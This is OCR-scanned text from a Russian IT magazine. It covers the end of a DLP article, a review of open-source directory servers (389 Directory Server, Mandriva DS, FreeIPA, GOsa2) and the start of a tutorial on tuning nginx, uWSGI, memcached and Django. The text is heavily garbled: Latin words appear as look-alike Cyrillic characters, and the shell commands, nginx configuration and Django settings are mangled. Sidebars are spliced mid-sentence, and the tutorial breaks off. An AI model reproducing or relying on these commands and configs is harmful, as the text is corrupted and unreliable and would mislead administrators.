тесІгаІесЬ.сопп/иЬипІи ). 

За плату предлагается Епіегргізе-версия, имеющая расширен- 
ные средства анализа, улучшенный интерфейс, карантин, функцию 
архивирования и обеспечиваемая поддержкой. 



ЗАКЛЮЧЕНИЕ 



Нужно помнить, что ОІР — это прежде всего инструмент, позво- 
ляющий значительно снизить риски, наличие которого уже само 
по себе дисциплинирует сотрудников. Ожидать, что внедрение 
такой системы гарантированно защитит отутечек, возникающих 
в результате умышленных действий, тоже не стоит. Если инсайдер 
захочет передать или вынести ценную информацию, он наверняка 
найдет способ для этого, поэтому следует также использовать все 
традиционные методы защиты. ^ 
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РЕКЛАМА 




* 




ОТБОРНЫЕ ПРОДУКТЫ 

СО ВСЕГО МИРА* 



® Мы 1№в мире №йіи самые лучшѵ№ продукты. 

Вы чіпй 1№жш1з наАти их рвдоНр под Т 






5УМ/АСК 



Сергей дгіпсіег Яремчук (дгіпсіеггазупаск.ги) 



КОРПОРАТИВНЫЕ 





ШКМІЫО 



в РгееІРАдо версии 



2.1.3 включительно 
имеется С5КР- 
уязвимость (СѴЕ- 
2011-3636). Для ее 
устранения следует 
обновиться до 2.1.4. 






И 






ѴЖ'И 



Сайт проекта 389 
ОігесІогуЗегѵег — 
сПгес1:огу.Тес1огарго)- 
есЕога . 

Сайт проекта ООза — 
озз.ропісиз.сІе/ІаЬз/ 
доза . 

Страница РесІ На( 

ІРА — гесІЬаІ.сот/ 
ргото/іра . 

Сайт проекта РгееІ- 
РА — ^гееіра.ого . 

Страница Мапсігіѵа 
ОігесІогуЗегѵег — 
тсіз.тапгігіѵа.огд . 



ОПЕНСОРСНЫЕ 
РЕШЕНИЯ ДЛЯ 
ЦЕНТРАЛИЗОВАННОГО 
УПРАВЛЕНИЯ 
ДОСТУПОМ К РЕСУРСАМ 



О 










в современной сети нередко организованы сотни 
пользовательских аккаунтов, работают десятки служб 
и сервисов. Чтобы большое количество точек управления 
не вызывало несогласованности, нужна единая база 
учетных записей и приложений. В последнее время 
появился целый ряд интересных опенсорсных проектов, 
расширяющих стандартные возможности ЮАР и вполне 
способных заменить Асііѵе Оігесіогу. 




ІПШ 



• РгееІРА 
используется для 
аутентификации 
и авторизации 

в решении оѴігІ для 
виртуализации, 
построенном 
на основе КѴМ. 

• Инсталляцию 
описываемых 
продуктов 
рекомендуется 
производить 
на «чистую» 
систему, 

не выполняющую 
никаких других 
функций. 

• Для 

синхронизации 
38905сАсІіѵе0ігес- 
(огу необходимо 
установить ѴѴіпсІоѵѵз 
5упс. 

• После установки 
пакета 389-ІІЗ для 
конфигурации 38905 
следует запустить 
скрипт зеіир-сіз- 
асігпіп.рі. 

• Утилита зузіет- 
сопПд-аиІепІіП- 
саііоп, входящая 
в состав Ресіога, 
содержит вкладку, 
позволяющую 
активировать 
аутентификацию 
через РгееІРА. 
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Корпоративные связи 




Мапсігіѵа Мападетепі Сопзоіе проста и понятна в работе 



389 0ІРЕСТ0РУ5ЕРѴЕР 



Сайт проекта: (іігес^огѵ.!ес1огарго]ес^огд . 

Лицензия: СЫІІ СРІ. 

ОС: Ресіога/Ресі На(/Сеп(05, будет работать в Ыпих (ОеЬіап, 
ІІЬипІи, Оепіоо), Зоіагіз, НР/УХ 11, Ігіх, АІХ, ѴѴіпсІоѵѵз и 05Р/1. 

Сервер каталогов уровня предприятия, создаваемый со- 
обществом при спонсорской поддержке РесІ НаС Базой для него 
послужил разрабатываемый с 1996 года Меізсаре Оігесіогу Бегѵег. 
Он получил новое имя — Ребога Оігесіогу Бегѵег — после того, 
как права на него в 2005 году приобрела Реб НаС В 2009 году 
проект снова изменил название на 389 Оігесіогу Бегѵег (389 — 
по номеру порта службы ЮАР). Причина проста: Р05 неразрывно 
ассоциировался с Ребога, что, по мнению разработчиков, тормо- 
зило развитие, в частности интеграцию в другие дистрибутивы. 

На основе 38905 Реб Наі выпустила коммерческую версию Реб Наі 
Оігесіогу Зегѵег (РН05) с техподдержкой 24/7. Возможности 38905 
включают полную поддержку протокола ЮАРѵЗ, 551/Т15- и 5А51- 
аутентификацию, синхронизацию данных (пользователь, группа, 
пароль) с Асііѵе Оігесіогу (при условии, что на КД ѴѴіп2кЗ/2к8 
установлен компонент ѴѴіпбоѵѵз 5упс), разграничение доступа 
вплоть до отдельных атрибутов (имя, группа, ІР и т. д.) В качестве 
криптодвижка используется библиотека N55 от МогіІІа Рго)ес1. 
Конструктивно 38905 состоит из сервера каталогов (Соге Оігесіогу 
5егѵег, С05) и сервера администрирования (Абтіп 5егѵег). Задача 
последнего — управление всеми доступными С05, для чего пред- 
лагается графическая консоль (389-сопзоІе) и утилиты командной 
строки. В Ыпих консоль устанавливается автоматически (написана 
на баѵа). Для управления из-под ѴѴіп2кЗ/2к8 на сайте проекта сле- 
дует скачать пакет ѴѴіпбоѵѵз Сопзоіе. 




бОза позволяет управлять учетными записями *піх и сервисами 

Разработчики отмечают высокую производительность и мас- 
штабируемость 38905. В одной сети может работать до четырех 
равноправных мастер-серверов с автоматическим разрешением 
конфликтов, балансировкой нагрузки и резервированием сервера. 
Поддерживаются работающие в режиме геаб-опіу сервера, некий 
аналог Реаб Опіу Оотаіп СопІгоІІег в Асііѵе Оігесіогу ѴѴіп2к8. 

В настоящее время проект официально предлагает репози- 
торий и пакеты для РНЕІ/Ребога (подходят и для СепШ5). Кроме 
того, возможна установка в других Ыпих (ОеЫап, СІЬипІи, Сепіоо), 
5оІагіз, НР/СІХ 11. Некоторые версии поддерживают также ѴѴіпбоѵѵз, 
Ігіх, АІХ и 05Р/1. Однако развертывание и последующая поддержка 
в «неофициальных» системах требует от админа уже некоторой 
подготовки. 

Компоненты 38905 выпускаются по лицензии ОМО ОРР, но сер- 
вер базируется на ряде продуктов с другими лицензиями (МРР/ 
ЮРР/6РР/Х). Стоит также отметить, что 38905 является составной 
частью РгееІРА — централизованного решения для управления 
информацией о пользователях и политиках и для аудита. Речь об 
этом продукте пойдет чуть ниже. 



МАМОРІѴА ОІРЕСТОРУ 5ЕРѴЕР 



Сайт проекта: тсіз.тапсігіѵа.огд . 

Лицензия: СЫІІ СРІ. 

Дистрибутивы: Мапсігіѵа, ОеЬіап/УЬипІи, Сеп(05/РНЕ1/Рес1ога, 
орепБІІБЕ, образ ѴМѵѵаге. 

Сервер Мапбгіѵа Оігесіогу 5егѵег (М05) — простое в использо- 
вании решение, позволяющее при помощи наглядного интерфейса 
управлять учетными записями пользователей и групп, доступом 
и сетевыми сервисами. По сути, это удобная надстройка над 



РУБІОМОІРЕСТОРУ 



Поскольку доступ к исходному коду бОза 
для тех, кто не имеет отношения к компании 
бопісиз бтЬН, был затруднен, разработчики 
приняли решение о создании более 
открытого и полностью поддерживаемого 
сообществом форка для привлечения 
сторонних специалистов, а также обеспечения 
условий для написания плагинов под большее 
количество приложений. Новый проект 
получил название РизіопОігесІогу ( ^изіопбігес- 
Іогѵ.огд ). Разработчики обещали не только 
создать самое «мощное и универсальное» 



решение для управления, имеющее более 
удобные инструменты для разработки, 
но и усовершенствовать документацию. 

В октябре 2011-го вышла версия РизіопОігес- 
Іогу 1.0.2, но, так как работа над проектом 
началась совсем недавно, о каких-то особых 
функциональных отличиях от бОза пока 
говорить не приходится. Документация, по сути, 
состоит из пары руководств, но, учитывая 
родство с 0Оза, на стадии ознакомления 
с РизіопОігесІогу можно использовать 
документацию на родительский проект. 



Четко определен список поддерживаемых 
дистрибутивов (ОеЬіап, СепіОБ 5/РНЕІ 5, Ребога 
14/15, орепБОБЕ 11.3/11.4, 51Е5 11), и, главное, 
для каждого из них создан репозиторий, 
обеспечивающий простую установку. 

Еще одно отличие заключается 
в официально поддерживаемых веб- 
серверах. Разработчики предлагают готовые 
конфигурационные файлы для АрасЬе2 
и ЕідЫірб, возможна также установка 
на пдіпх, но настройки придется создавать 
самостоятельно. 
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5УМ/АСК 





Для настройки РгееІРА можно использовать консоль 



Консоль управления 389 ОігесІогуЗегѵег 



ЮАР — ОрепЮАР, хотя возможна и совместная работа с 38905. 
Функционально может выступать в качестве РОС (уровня ѴѴіпсІоѵѵз 
N74), ЮАР-сервера с синхронизацией учетных записей и паро- 
лей, полностью заменить Асііѵе Оігесіогу либо интегрироваться 
в нее. Клиентскими ОС могут служить ѴѴіпсІоѵѵз, Ыпих и Мае 05 X. 
Интерфейс позволяет производить настройку аккаунтов и АСІ 
в 5атЬа, управлять совместным доступом, печатью на базе ССІР5, 
доставкой почты (Роз^іх), конфигурировать 5риісІ и службы 0М5/ 
ОНСР, администрировать учетные записи 61РІ. Пакет включает 
КегЬегоз и может быть использован для организации однократной 
аутентификации (550). Разграничение доступа для объектов уста- 
навливается вплоть до отдельных атрибутов: пользователь, группа, 
ІР-адрес, время и т. д. 

Особенно приятно, что проблемы, преследовавшие компанию 
Мапбгіѵа, не затронули М05 и продукт постоянно развивается. 

В последних версиях к указанным возможностям добавилось 
управление учетными записями системы Іагаіа, обеспечивающей 
совместную работу, централизованное хранение публичных клю- 
чей 0реп55Н, аудит, политики паролей и многое другое. Модульная 
архитектура позволяет добавлять нужную функциональность или 
убирать из интерфейса лишнее. М05 легко масштабируется, под- 
держивая несколько тысяч записей на один сервер. 

Непосредственно для управления сервисами предназначен 
модуль ММС адепі, написанный на РуіЬоп и использующий для 
обмена данными ХМІ-РРС. Агенты настраиваются при помощи 
очень простого в использовании веб-интерфейса ММС (Мапбгіѵа 
Мападетепі Сопзоіе). Администратор может выбрать один из двух 
режимов отображения: МогітіаІ или ЕхрегС 

В отличие от 38905, пакеты предлагаются не только для «род- 
ного» дистрибутива: имеется собственный репозиторий ОеЬіап, 
сборки для СепШ5/РНЕ1/Рес1ога и ореп505Е, а также готовый 
образ ѴМѵѵаге. Таким образом, серверную часть М05 можно отно- 
сительно быстро и без проблем установить в любой *піх-системе. 
Продукт включен в комплект поставки Мапбгіѵа Епіегргізе 5егѵег. 
М05 представляет собой самое простое в установке и конфигури- 
ровании решение, освещенное в нашем обзоре, однако самостоя- 
тельная сборка на других системах, кроме МЕ5, все-таки требует 
некоторых навыков по работе с ЮАР. Документация проекта 
весьма подробна и позволяет разобраться во всех его нюансах. 



РРЕЕІРА^ 



Сайт проекта: ^гееіра.огд . 

Лицензия: СЫІІ СРІ. 

Дистрибутивы: сервер — Рес1ога/Сеп105, клиент — Ііпих, АІХ, НР- 
ІІХ, Боіагіз, орепБІІБЕ. 

Цель проекта РгееІРА (Ргее Иепіііу, Роіісу апсі Аисііі) — созда- 
ние для Ыпих-систем среды, представляющей собой альтернативу 



Асііѵе Оігесіогу и позволяющей централизованно управлять аутен- 
тификацией пользователей, устанавливать политики доступа и ау- 
дита. Фактически РгееІРА — это симбиоз нескольких опенсорсных 
проектов, таких как дистрибутив Ребога, 38905, МІТ КегЬегоз, МТР 
и ВІМО. На этом проекте, развиваемом при финансовой поддержке 
Реб НаЦ основан используемый в коммерческом дистрибутиве 
продукт ІРА, который Реб Наі представила общественности летом 
2008 года. 

Впервые код РгееІРА появился в составе Ребога 9 (май 2008- 
го), однако нормальная синхронизация с Асііѵе Оігесіогу на тот 
момент еще не была реализована. На первых порах клиенты 
могли подключаться вручную, но это было неудобно. В октябре 
2009-го началась работа над новой веткой 2.0. Ее финальная 
версия была представлена в конце марта 2011-го. День, в который 
был анонсирован релиз, запомнился многим пользователям Ыпих 
как «Ребога 15 Тезі Оау», посвященный именно тестированию 
Ргее1РА2. В настоящее время реализованы: 

• центра л изованное у правление учетным и записям и пользовате- 
лей, групп, компьютеров и сервисов; 

• управлениедоступом кприложениям, установка политикпаро- 
лей и настроек КегЬегоз, управление правилами 511 00; 

• аутентификация КегЬегоздля пользователей иузлов; 

• Нозі Вазеб Ассезз Сопігоі — управление и хранение ролей 
в ЮАР; 

• службауправления сертификатами (Оодіад СегЬЯсаІе 5егѵег). 

Сеть, построенная с применением РгееІРА, функционально мо- 
жет состоять из трех типов систем: одного или нескольких серве- 
ров, клиентских машин и компьютера администратора. Последний, 
по сути, представляет собой обычный клиентский десктоп с кон- 
сольными утилитами для удаленного управления РгееІРА (кстати, 
использовать их совсем не обязательно — вполне можно обойтись 
веб-интерфейсом, который написан на баѵа). 

Чтобы снизить нагрузку на канал, клиент использует локаль- 
ный кеш (ЮВ и ХМР), получая из него настройки в том числе и при 
отсутствии доступа к серверу. На клиентской системе устанавли- 
вается агент управления аутентификацией 5550 (5уз1ет 5есигі1у 
5егѵісез Оаетоп). Клиентская часть реализована не только для 
Реб Наі/Ребога и клонов, но и для других ОС и платформ: АІХ, 
НР-ОХ, 5оІагіз, ореп5С15Е. Что интересно, над сборкой клиентских 
пакетов для ОЬипІи/ОеЫап ( ІаипсЬраб.пеіДгееіра ) и обеспечением 
их совместимости работают два сотрудника Реб НаР 

Специальное приложение (сегітопдег) упрощает создание 
сертификатов и управление ими, автоматически генерируя и по- 
лучая новый сертификат по истечении срока действия старого. 
Опционально возможна интеграция с 0М5-сервером на базе ВІМО 
(нужен плагин ЮАР ВІМО с динамическим обновлением через 
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Корпоративные связи 




Менеджер аутентификации в Ресіога 
позволяет выбрать РгееІРА 



АРАСНЕ ОІРЕСТОРУ 5ЕРѴЕР 



Сервер каталогов, разрабатываемый 
АрасИе БоНѵѵаге Роипсіаііоп ( сіігесіогу. 
арасЬе.ого ). Полностью написан на ^аѵа, 
поддерживает ЮАРѵЗ, КегЬегоз и СИапде 
РаззѵѵогсІ Ргоіосоі. Позиционируется как 
встраиваемое в другие Заѵа-приложения 
решение, однако никто не запрещает 
использовать его автономно. Обеспечивает 
выполнение ЮАР и КегЬегоз, возможна 
реализация поддержки любого протокола. 
Продукт мультиплатформенный. На сайте 
проекта доступны пакеты для установки 



в Ііпих, ѴѴіпсІоѵѵз и Мае 05 X, исходные 
тексты позволяют собрать А05 на любой 
системе, для которой имеется Заѵа. 

Кроме стандартных возможностей ЮАР, 
реализованы хранимые процедуры, триггеры, 
динамические объекты Заѵа и многое 
другое. Распространяется под лицензией 
АрасЬе. 6 рамках проекта разрабатывается 
АрасЬе Оігесіогу Біисііо, включающий 
ЮАР-браузер, браузер схем, редакторы 
ЮІР и 05М1, клиентские программы для 
администрирования. 



655-Т5І0). При управлении компьютерами и группами компьюте- 
ров полномочия подтверждаются при помощи КегЬегоз кеуІаЬ или 
сертификата. 

Модульная архитектура серверной и клиентской части по- 
зволяет без особых проблем интегрировать РгееІРА и любой 
продукт. В настоящее время политики используются в том числе 
и для хранения параметров доступа к локальным приложениям 
и настройкам рабочего стола. Пока реализованы не все функции 
управления политиками, аудита и контроля, которые планируется 
включить в проект. 

Нет настроек правил БЕЫпих, поддержки 5атЬа, РгееРАОШЗ, 
централизованного управления ключами 55Н и ІѴМ, ОТР и многого 
другого. Очевидный минус продукта — ориентированность в пер- 
вую очередь на производные от Реб Наі дистрибутивы. Установить 
серверную часть РгееІРА можно из репозиториев Ребога, СепШ5, 
К12РТ5Р и совместимых с ними. Разработчики сделали всё, чтобы 
упростить процесс локализации в версии 2.0 (используется деиехі 
и 1ЯР8). В каталоге іпзіаіі/ро имеется файл ги.ро, в котором пере- 
ведена лишь малая часть сообщений. 

Проект активно развивается, и при этом обнаруживаются ошиб- 
ки. Последний релиз 2.1.4 устраняет С5РР-уязвимость (подделка 
межсайтовых запросов, СѴЕ-2011-3636). 



605А2 



Сайт проекта: озз.допісиз.сіе/ІаЬз/доБа . 

Лицензия: СЫІІ СРІ. 

Дистрибутивы: пакеты — ОеЬіап/ІІЬипІи, Рес1На(/Сеп(05/Рес1ога, 
ореп5У5Е/51Е5, из исходных текстов — любой *піх. 

Проект 60за2, являющийся надстройкой для популярных 
опенсорсных приложений, предоставляет администратору единый 




Девиз Шепіііу РоІісуАисШ хорошо поясняет сущность РгееІРА 



центр управления всей ИТ-инфраструктурой. Интерфейс позволя- 
ет управлять учетными записями *піх и 5атЬа, правами пользова- 
телей и групп, компьютерами, списками рассылок, приложениями, 
настройками основных сетевых служб: ОНСР, 0М5, НТТР, 5МТР 
и т. д. Разработка ведется под эгидой компании бопіеиз бтЬН, 
которая использует бОза в своих сервисах. 

Все функции вынесены в плагины (принцип «один сервис = 
один плагин»), поэтому админ собирает конфигурацию в соответ- 
ствии со своими нуждами. 

В настоящее время реализовано более 30 плагинов, обеспе- 
чивающих управление такими сервисами, какЗциіб, Оапзбиагбіп, 
Роз^іх, Соигіег-ІМАР, Маіібгор, 6МАРѴѴР, Сугиз-5А5Р, 0реп55Р, 

І5С ОНСР, ѴѴеЬОАѴ, РигеРТРб, РРТР, КегЬегоз, Азіегізк, Мадіоз, 
0Р5І, Меіаіаік, РАІ, гзузіод, и серверами коллективной работы: 
506о, ОрепСгоирѵѵаге, КоІаЬ, Бсаііх. При этом все вышеуказанные 
плагины не обязательно должны работать на одном сервере, неко- 
торые из них можно установить на отдельные хосты. 

Учетные записи пользователей объединяются в группы, для 
которых назначаются разрешенные приложения. При создании 
новых аккаунтов применяются шаблоны (админ создает их сам) 
с прописанными правами доступа к объектам. Набор разрешений 
АСЕ состоит из типа, определяющего видимость, объектов (поль- 
зователей/групп) и разрешений. Разрешения определяют все 
возможные действия: создание, удаление, перемещение, чтение, 
запись и т. д. 

бОза — единственный в нашем обзоре проект с локализо- 
ванным интерфейсом управления. Правда, локализован он пока 
не полностью, но использование деиехі позволяет при необходи- 
мости сделать это самостоятельно. 

Поддерживается установка в любом дистрибутиве Ыпих. Раз- 
работчики рекомендуют ОеЫап, под который создан отдельный 
репозиторий. Также доступны пакеты для Реб Наі/СепШ5/Ребога 
и ореп5115Е/5РЕ5, но, как правило, разработчики не спешат их 
собирать, поэтому версии немного запаздывают. Можно исполь- 
зовать любой веб-сервер, однако предпочтение отдается АрасЬе2 
и пдіпх. Документация доступна только на английском и не по- 
спевает за развитием проекта, многие моменты отражены в ней 
весьма поверхностно. 



ЗАКЛЮЧЕНИЕ 



Даже невооруженным глазом видно, что наиболее многофункцио- 
нальным инструментом является С0за2. 

Это решение обеспечивает управление учетными запися- 
ми и многочисленными сервисами, поддерживает установку 
в большинстве дистрибутивов Ыпих, имеет локализованный 
интерфейс. Однако окончательный выбор зависит от конкретной 
задачи . ^ 
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Евгений Зобнин [ехесЬіІ.ги] 




ИСПЫТАНИЕ 




СОЗДАЕМ ВЫСОКОПРОИЗВОДИТЕЛЬНЫМ САЙТ 
С ИСПОЛЬЗОВАНИЕМ НСІНХ И ОЗАНСО 



При обсуждении высокой производительности веб-приложений на ум невольно приходят такие 
названия, как пдіпх, тетсасЬесІ, еассеІега1:ог, бірбор и им подобные. Фактически это стандартный 
набор для любого высоконагруженного сайта, написанного с использованием РНР. Но что если мы 

хотим выжать все соки из сайта на О]апдо? 
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Стандартная админка 0]апдо 



РАСПРЕДЕЛЕННЫЙ КЕШ 



0]апдо умеет распределять кеш по нескольким тетсасИесІ- 
серверам в автоматическом режиме. Для этого достаточно указать 
все их адреса через точку с запятой: 

САСНЕ_ВАСКЕМО = "тет- 

сасііесі: //172. 19. 26. 240: 11211; 172. 19. 26. 242: 11212; 
172.19.26.244:11213/^ 



Итак, допустим, мы собираемся запустить новый веб-проект и 
решили строить его с использованием фреймворка 0;апдо. По- 
чему 0;апдо? Потому, что он красив, производителен и невероятно 
дружелюбен к разработчикам. 0;апдо использует всю мощь языка 
РуШоп, чтобы максимально разгрузить программиста. Благодаря 
архитектуре модель-вид-контроллер (МѴС) и модульному дизай- 
ну, то есть структуре, построенной из обособленных кирпичиков, 
О;апдо-приложения на удивление просты в конструировании и 
сопровождении. Система берет на себя 90% работы, поэтому описа- 
ние данных, создание алгоритма их обработки и отображения пре- 
вращается в тривиальную задачу, зачастую решаемую в несколько 
десятков строк кода (например, для создания простейшего сайта с 
полноценной веб-админкой достаточно написать всего несколько 
строк). И всё это без уродливого 501, скрытого от программиста 
за классами РуШоп, на основе которых и генерируется схема базы 
данных. 

Мы ожидаем, что ресурс будет иметь высокую посещаемость, 
поэтому нам нужно сразу предусмотреть все возможные пути опти- 
мизации. Перво-наперво мы должны выбрать легкий, быстрый, 
удобный в настройке и сопровождении веб-сервер. Это, конечно 
же, пдіпх, который просто не имеет конкурентов по скорости 
отдачи контента. Мы откажемся от стандартных конфигураций 
со всякими громоздкими апачами на стороне бэк-энда и будем 
использовать пдіпх как основной веб-сервер (впоследствии такую 
схему можно легко расширить с помощью дополнительных серве- 
ров и балансировщиков нагрузки). 

Второй шаг — решение вопроса о том, как будут связаны пдіпх 
и 0)апдо. Понятно, что лучше всего использовать интерфейс 
ѴѴ56І, созданный специально для РуШоп, но мы должны выбрать 
правильную реализацию этого интерфейса. Казалось бы, здесь 
вариант один — тосІ_ѵѵ5ді из комплекта пдіпх, однако на роль 
связующего звена больше подходит бридж иѴѴ56І ( рго]есІ5.ипЬі1.іі/ 
цуѵзді ). который показывает гораздо лучшую производительность 
при минимальных требованиях к оперативной памяти (пруфлинк 
для сомневающихся: пісЬоІ.аз/ЬепсЬппагк-оІ'-рѵШоп-ѵѵеЬ-зегѵегз ). 

Третий вопрос — кеширование. Ясно, что без кеша никак не 
обойтись и что реализован он будет с использованием тетсасЬесІ. 
Другое дело, что проблема кеширования многогранна и ее ре- 
шение сильно завязано на специфику самого сайта. В статье мы 
рассмотрим несколько «универсальных» методов кеширования, 
включая топорное хранение сгенерированных НТМІ-страниц в 
памяти и прозрачное кеширование запросов к БД, а также обсудим 
специфику применения тех или иных методов. 

Наконец, мы должны правильно всё это настроить, учитывая 
особенности используемого железа, объем оперативной памяти и 
т. д. Вопрос этоттакже многогранен, но несколько универсальных 
рекомендаций все-таки существует. 



ПРИСТУПАЕМ 



Начнем, как и положено, с установки нужных нам программных 
компонентов. Большинство из них есть в репозитории любого дис- 
трибутива, поэтому здесь всё просто: 



$ зисіо ар1;-§е1: іпзііаіі п§іпх тешсасііесі руііііоп \ 
ру1;Ііоп-5е1:ир1;ооІ5 тузді-зегѵег 

Вместо Му501 можно, конечно же, установить РозІдгеБОІ. 
0)апдо, а также иѴѴ56І и руШоп-тетсасЬесІ мы поставим из репо- 
зитория РуШоп. 

$ зисіо еа5у_іп5І;а11 с1дап§о иыз§і руІіІіоп- тешсасііесі 

Также нам понадобится кеширующий фреймворк сІ)оІіппу-сасІіе, 
о назначении которого я расскажу позже: 

$ зисіо еа5у_іп5І;а11 сідоііппу-сасііе 



НАСТРОЙКА М6ІМХ 



Первым делом настраиваем пдіпх. Всё по стандартной схеме. Бэка- 
пим стандартный конфиг пдіпх: 

$ зисіо тѵ /е1:с/п§іпх/{п§іпх.соп-р^п§іпх.соп-р.о1сІ} 

Создаем новый конфиг и пишем в него следующее: 

# ѵі /еѣс/пдіпх/пдіпх .согтР 

# Для достижения максимальной производительности делаем 

# число рабочих процессов равным числу процессорных ядер 

ыогкег ргосеззез 4: 

# Даем рабочим процессам более высокий приоритет 

ыогкег ргіогіііу -5; 

# Уменьшаем число вызовов ^е1:1:ітео-РсІауП . чтобы 

# не тратить ресурсы впустую 

1іітег_ге501и1:іоп ІѲѲтз; 

еггог 1о^ /ѵаг/Іо^/п^іпх/еггог . 1о^; 

рісі /ѵаг/гип/п^іпх.рісі: 

еѵепііз { 

# Одновременное количество коннектов. 

# обслуживаемых одним рабочим процессом 

ыогкег соппесіііопз 1024; 

# Опция для РгееВБР 

# изе кдиеие: 

} 

Ы:1:р { 



^^АN60 ИСПОЛЬЗУЕТ ВСЮ 
МОЩЬ ЯЗЫКА РУТНОМ, ЧТОБЫ 
МАКСИМАЛЬНО РАЗГРУЗИТЬ 
ПРОГРАММИСТА 
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Щ Оіапдо зеШпдз Тог ил1мо1()_1}1од рг^^ес1. 
Тгзоі ов Ілрогі рвІП 

ВЯ5ЕЭІС = раіІііСІігпаі№СрйІН.аЬзра(Ы Еііе Л 

ОЕВиВ = 

ТЕ№ІЙТЕ_РЕВУв = 0ЕВ1В 

пожне = { 

( ’ЕѵдЕгу 7сЬпіп*, * 2 аЬтгіпВдпаі] .ссняЛ ^ 



НЙНП6СРЗ = ПОПЖЗ 

0ЙТЙѲЙ5Е.ЕН5ІЫЕ = 'ЕдІіІеЗ* 
+г 'огасіе', 

ВЙТЙВЙЗЕ.НННЕ = 'сЬ,Бд]іів' 
0НТЯВЯ5Е_и5ЕІ? = * ’ 
№ІТПВЙ5Е_РН581ЛеВ = ' ' 
0ЯТЙВЯ5Е.Н08Т = ' ‘ 

МТПВРЗЕ РОРТ = ' ' 



К 'роЕІдгв5д]_рБусар^' , *роЕ.ІдгвЕд1 ' , 'шуЕдІ', 'ЕцЦІеЭ' □ 

І От раіМ (р ЕІаІаЬаан Еі ів і'Г изіпд ЕдІИвЭ. 

V Ноі иаесі ыІІН здШеЭ. 

й Нрі изеіі ыііН здІИрЭ. 

Ш 5е( ‘Іо етр(у зігіод Гог ІосаІНсяІ. Ноі изесі шіЖ есіШеЭ. 

Й Зеі Іо еіц>1у ЕІгіпд іаг НвЕвиІІ, Нрі иЕеіІ шііН БдІіівЗ, 



ТІГС.20ИЕ = 'Н5уа/Ѵеіга1ѳг1пЬигд' 



1ііуч4іі| [ріціпол ] 


[1.1][иЯ 


вв^ііпд&.ру' ВЭ^. 24€С 





Стандартный конфиг 0]апдо 



# Стандартные опции 

іпсіисіе /е1:с/п^іпх/тіте.1:ѵре5: 

ассѳ55 1о^ /ѵаг/1о^/п^іпх/ассе55Ло^: 

# Включаем использование системного в ызова 5епсІЯ1е() 

БепсІІіІе оп; 

1:ср_пори5Іі о-р-р; 

# Держать кеераііѵе-соединение откр ытым 65 секунд 

кеера1іѵе_1:ітеои1: 65: 

# Включаем 67ІР-компрессию со стандартными опциями 

егір оп; 

§ 2 Ір_тіп_ 1 еп§ 1 ;Іі 1100; 

^2Ір_Ьц-р-Рег5 64 8к; 

^2Ір_сотр_1еѵе1 3; 

§2Ір_ІтЬ1:р_ѵег5Іоп 1.1; 

^ 2 Ір ргохіесі апѵ : 

^2Ір_1:ѵре5 1:ех1:/р1аіп арр1іса1:іоп/хт1 

арр1іса1:іоп/х-^аѵа5сгір1: 1іех1:/с55 : 

# Настройки сайтов в отдельных конфигах (это 

# стандартный каталог для РеЬіап 

іпсіисіе /е1:с/п^іпх/5І1:е5-епаЫесІ / * ; 

} 

Несколько ремарок: 

• Приоритет рабочих процессов следует изменять с осторожно- 
стью, иначе они могут просто «задавить» все остальные сервисы, 
включая тетсасЬесІ и процессы базы данных. В идеалелучше 
протестировать работу пдіпх с дефолтными настройками и лишь 
затем приступать к экспериментам. 

• Опция иве кдиеие немногоускоряетработу пдіпх во РгееВЗО 
благодаря использованию механизма кдиеие вместо более мед- 
ленного ероІІ. 

• Системный вызов зепсІЯІеО применяется для единовременной от- 
правки содержимого целого файла в сокет. Методсиспользованием 
этого вызова работаетбыстрее, чем стандартное последователь- 
ное копирование данных, и позволяетсэкономить на оперативной 
памяти. Однако, если сервер оснащен недостаточным количеством 



ОЗУ, зепсІЛІеО только вынудит пдіпх часто свопиться и тем самым за- 
медлит его работу. Опция 1ср_пори5Ь заставляет пдіпх отправлять 
НТТР-заголовки в одном пакете, но она бесполезна без зепсІЛІе. 

• 621 Р-компрессия также может сыграть с сервером злую шутку. 

С одной стороны, такая компрессия уменьшает объем пере- 
даваемыхсервером данных, благодаря чемуон можетуспеть 
обработать больше запросов, с другой — повышает нагрузку на 
процессор, что приводит к прямо противоположному результату. 
Поэтому точно выяснить, нужна ли она тебе, можно только экспе- 
риментальным путем, причем эксперименты следует проводить 
под предельной нагрузкой. 

Теперь самое время задать настройки сайта: 

# ѵі /е-Ьс/п^іпх/БІ-ЬеБ-епаЫесІ/туБІ-Ье 

Бегѵег { 

# Порт и имя сайта 

1І5І:еп 80; 

зегѵег пате Ііо5І:.сопі; 



ТЕСТИРОВАНИЕ 

ПРОИЗВОДИТЕЛЬНОСТИ 



Протестировать производительность веб-сервера можно с 
помощью утилиты аЬ из комплекта АрасИе: 

$ аЬ -кс 500 -п 10000 бТТр: //10. 1.1.1/ 

Для этого также используется специальная программа ИНрег^: 

$ Ітііірег-Р --Ііо§ --5егѵег=10. 1.1.1 \ 

--Ы5е55=2000^10^2 --гаіе 300 - -іітеоиі: 5 
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# Стандартные настройки журналирования 

ассе55_1о§ /ѵаг/1о§/п§іпх/Ыо§-ассе55 . 1о§; 

еггог_1о§ /ѵаг/1о§/п§іпх/Ыо§-еггог. 1о§; 

# Адрес статики^ используемой в админке 0]’ап§о 

Іосаіііоп /шесііа/ { 

ГООІ; /и5г/1оса1/1іЬ/ру1;Ііоп2.6/сІІ5І;-раска§е5/ 

сІ^ап§о/соп1:гіЬ/асІтіп : 

} 

# Статика самого сайта 

Іосаіііоп ^.+\.(зр§|зре§|§і-Р|рп§|ісо|с55|2Ір|іі§2|§2 

|гаг|Ь22| I рс1-р| ррі Ііхі Ііаг I 1Ьтр|з5|тоѵ) { 

ГООІ: /ѵаг/ыыы/Ііо5І:.сот 

} 

# А дрес и параметры ІлІБб І- гейт а 

Іосаііоп / I 

иы5§і_ра55 127.0.0.1:8012; 

іпсіисіе иыБ^і рагагпБ ; 

} 

} 

Здесь ничего необычного: указываем корневой каталог сайта 
/ѵаг/ѵѵѵѵѵѵ/ЬозІ.сот и адрес иѴѴЗСІ-сервера 127.0.0.1:8012. При- 
ступаем к настройке 0]апдо и иѴѴЗбІ. 



НАСТРОЙКА ООАМ60 И 0ѴѴ56І 



Настроить 0]апдо для совместного использования с иѴѴЗбІ очень 
просто. Для этого достаточно выполнить три простых действия, 
которые перечислены ниже. 

1 . Создатьсам О]апдо-проект: 



^^АN60 1.3 



В О]апдо 1.3 синтаксис определения кеш-бэк-энда изменился и 
теперь имеет следующий вид: 

# Пример для тешсасіі есі (два сервера) 

САСНЕ5 = { 

'сІе-Раи11: ' : { 

